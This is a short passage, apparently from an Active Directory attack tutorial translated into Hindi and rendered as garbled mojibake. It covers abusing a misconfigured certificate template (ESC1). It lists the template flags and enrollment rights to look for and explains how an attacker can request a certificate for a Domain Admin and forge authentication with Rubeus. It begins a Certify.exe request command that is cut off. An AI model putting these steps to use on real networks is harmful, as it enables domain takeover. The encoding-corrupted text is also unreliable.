рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ msPKI-Certificates-Name-Flag рдорд╛рди "ENROLLEE_SUPPLIES_SUBJECT" рдкрд░ рд╕реЗрдЯ рд╣реИ рдФрд░ Enrollment Rights Domain/Authenticated Users рдХреЛ рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВред рдЗрд╕рдХреЗ рдЕрддрд┐рд░рд┐рдХреНрдд, рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдХрд┐ pkiextendedkeyusage рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ "Client Authentication" рдорд╛рди рд╣реИ рдФрд░ рд╕рд╛рде рд╣реА "Authorized Signatures Required" рдкреИрд░рд╛рдореАрдЯрд░ 0 рдкрд░ рд╕реЗрдЯ рд╣реИред

рдпрд╣ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЗрд╡рд▓ рдЗрд╕рд▓рд┐рдП рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдпреЗ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╕рд░реНрд╡рд░/рдХреНрд▓рд╛рдЗрдВрдЯ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╕рдХреНрд╖рдо рдХрд░рддреА рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ Domain Admin ("DA") рдХрд╛ UPN рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдкреНрд░рд╛рдкреНрдд рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ Rubeus рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЬрд╛рд▓реА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддрд╛ рд╣реИред

_рдиреЛрдЯ: рдпрджрд┐ рдХреЛрдИ Domain Admin Protected Users рд╕рдореВрд╣ рдореЗрдВ рд╣реИ, рддреЛ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЗрдЪреНрдЫрд╛рдиреБрд╕рд╛рд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рд▓рдХреНрд╖реНрдп рдХреЗ рд▓рд┐рдП DA рдЪреБрдирдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдЬрд╛рдБрдЪ рдХрд░реЗрдВред_

Certify рдХреЗ рд╕рд╛рде DA рдХреЗ рдЦрд╛рддрд╛ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ```powershell .\Certify.exe request /template: